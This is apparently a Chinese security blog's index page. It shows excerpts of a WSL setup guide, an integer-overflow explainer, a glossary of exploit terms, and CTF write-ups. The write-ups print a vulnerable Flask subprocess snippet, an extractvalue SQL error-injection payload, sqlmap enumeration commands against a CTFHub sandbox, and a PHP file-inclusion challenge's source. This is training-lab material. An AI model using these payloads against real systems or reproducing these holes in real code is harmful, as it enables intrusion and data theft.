梦~醒🍇

[TOC] 一、在Windows上安装Linux子系统 前提条件 windows机器需要支持虚拟化，并且需要在BIOS中开启虚拟化技术，因为WSL2基于hyper-V。 查看是否开启虚拟化 按住Windows+R输入cmd打开命令行，输入 1systeminfo 可以看到如下字样，代表电脑已经支持虚拟化，可继续安装 1234Hyper-V 要求: 虚拟机监视器模式扩展: 是 固件中已启用虚拟化: 是 二级地址转换: 是 数据执行保护可用: 是 无论是Windows10还是Windows11，所使用的Windows是最新版的，如果不是最新版，请在设置-Windows更新中将系统更新到最新版本 安装步骤 开启开发者模式 开启“适用于Linux的Windows子系统”： 找到 控制面板-程序和功能-启用或关闭Windows功能，选中“适用于Linux的Windows子系统”和“虚拟机平台”，然后点击确定。需要重启电脑。 安装Linux分发版： 没有wsl的 ...

整数溢出的原理： 1.整数类型限制： 在计算机中，整数类型（如 int, short, long 等）都有固定的位宽（如 8 位、16 位、32 位、64 位等），这些位宽决定了整数能表示的最大值和最小值。 例如，对于一个 32 位有符号整数，其取值范围是 -2,147,483,648 到 2,147,483,647。 溢出情况： 1.正溢出：当结果值超过最大正整数时，会发生正溢出。例如，在 32 位有符号整数中，2,147,483,647 + 1 会导致结果变为 -2,147,483,648（环绕回最小 负数）。 2.负溢出：当结果值低于最小负整数时，会发生负溢出。例如，在 32 位有符号整数中，-2,147,483,648 - 1 会导致结果变为 2,147,483,647（环绕回最大正数）。 操作示例： 假设我们有一个 8 位有符号整数，范围是 -128 到 127。 如果我们执行 127 + 1，结果应该是 128，但超出了 8 位整数的范围，因此实际结果会变为 -128（即发生正溢出）。 类似地，如果执行 -128 - 1，结果应该是 -129，但同样超出了 ...

[TOC] 来源：ctfshow easyPytHon_P 考点：代码审计，源代码查看 打开后查看源码，发现一个源码地址，打开看看 可以知道在此目录下有个flag.txt文件，再观察源码 123456789101112131415from flask import requestcmd: str = request.form.get('cmd')param: str = request.form.get('param')# ------------------------------------- Don't modify ↑ them ↑! But you can write your code ↓import subprocess, osif cmd is not None and param is not None: try: tVar = subprocess.run([cmd[:3], param, __file__], cwd=os.getcwd(), timeout=5) ...

[TOC] 1 漏洞验证相关概念 1.常见概念 POC：全称 ’ Proof of Concept '，中文 ’ 概念验证 ’ ，常指一段漏洞证明的代码。 EXP：全称 ’ Exploit '，中文 ’ 利用 '，指利用系统漏洞进行攻击的动作。 Payload：中文 ’ 有效载荷 '，指成功exploit之后，真正在目标系统执行的代码或指令。 Shellcode：简单翻译 ’ shell代码 '，是Payload的一种。Shellcode也有很多种，包括正向的，反向 的，甚至meterpreter。 2.POC与EXP对比 POC是用来证明漏洞存在的，EXP是用来利用漏洞的，两者通常不是一类，或者说，PoC通常是无害 的，Exp通常是有害的，有了POC，才有EXP。 3.Payload与Shellcode Payload有很多种，它可以是Shellcode，也可以直接是一段系统命令。 4.Payload与EXP 同一个Payload可以用于多个漏洞，但每个漏洞都有其自己的EXP，也就是说不存在通用的EXP。 5.Payload模块 在Metasploit Framework ...

[TOC] 整数型注入 看到源码了，直接sql一套秒了 字符型注入 SQL 报错注入 构造payload 1 and (select extractvalue(1,concat(‘~’,(select database())))) 后续步骤跟sql基本步骤一样 SQL 布尔注入 人工测试太麻烦，这里直接使用sqlmap,知道这有sql注入漏洞，就省去扫描步骤了。 先查看当前数据库 --sqli 1sqlmap -u 'http://challenge-3fe138f1ff2d9eae.sandbox.ctfhub.com:10800/?id=2' -batch --current-db 再查看表 1sqlmap -u 'http://challenge-3fe138f1ff2d9eae.sandbox.ctfhub.com:10800/?id=2' -batch -D 'sqli' --tables 查看flag表中的字段 1sqlmap -u 'http://challe ...

[TOC] php://伪协议是php提供的一些输入输出流访问功能，允许访问php的输入输出流，标准输入输出和错误描述符，内存中，磁盘备份的临时文件流，以及可以操作其他读取和写入文件的过滤器。 首先看到题目提示传个file，遂/?file=…一个随意参数，而后得到源代码 123456789101112131415161718<?phpini_set("allow_url_include","on");header("Content-type: text/html; charset=utf-8");error_reporting(0);$file=$_GET['file'];if(isset($file)){ show_source(__FILE__); echo 'flag 在flag.php中';}else{ echo "传入一个file试试";}echo "</br>" ...